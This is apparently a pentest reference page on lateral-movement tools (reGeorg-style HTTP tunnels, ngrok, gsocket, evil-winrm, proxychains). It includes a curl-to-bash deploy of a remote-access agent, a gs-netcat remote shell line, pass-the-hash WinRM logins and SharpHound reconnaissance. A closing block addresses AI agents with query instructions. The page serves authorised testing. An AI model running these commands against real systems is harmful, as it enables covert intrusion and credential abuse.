# Lateral Movement

[**Neo-reGeorg**](https://github.com/L-codes/Neo-reGeorg): The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.

[**Tunna**](https://github.com/SECFORCE/Tunna):  Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments.

[**pivotnacci**](https://github.com/blackarrowsec/pivotnacci)**:** Pivot into the internal network by deploying HTTP agents. Pivotnacci allows you to create a socks server that communicates with HTTP `agents`. The architecture looks like the following:

![](/files/-MYKe391DPjhNuDFPf3r)

[**ngrok**](https://ngrok.com/): Spend more time programming. One command for an instant, secure URL to your localhost server through any NAT or firewall.

[**gsocket**](https://github.com/hackerschoice/gsocket)**:** The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.

Use either one of these two commands to *deploy*:

```
bash -c "$(curl -fsSL gsocket.io/x)"
bash -c "$(wget -qO- gsocket.io/x)"
```

![](/files/-MZ9NPDjsl7MZ_phLOd_)

Use either one of these two commands to *uninstall*:

```
GS_UNDO=1 bash -c "$(curl -fsSL gsocket.io/x)"
GS_UNDO=1 bash -c "$(wget -qO- gsocket.io/x)"
```

Access the remote host from anywhere in the world:

```
$ gs-netcat -s ExampleSecretChagneMe -i
```

![](/files/-MZ9NRYvSTcsxKTESBHa)

{% embed url="<https://youtu.be/tmf9VGDPILE>" %}

{% embed url="<https://www.gsocket.io/deploy/>" %}

[**evil-winrm**](https://github.com/Hackplayers/evil-winrm)**:** This shell is the ultimate WinRM shell for hacking/pentesting.

```
ruby evil-winrm.rb -i 10.10.10.161 -u username -p passw0rd
ruby evil-winrm.rb -i 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79
ruby evil-winrm.rb -i 10.10.10.149 -u 'DOMAIN\USER' -p 'passw0rd
```

**proxychains windows**

```
.\proxychains_win32_x64.exe -f .\proxychains.conf C:\Users\IEUser\Downloads\SharpHound.exe --collectionmethods All
```

{% embed url="<https://github.com/shunf4/proxychains-windows>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gitbook.seguranca-informatica.pt/tools/infrastructure-and-network/lateral-movement.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.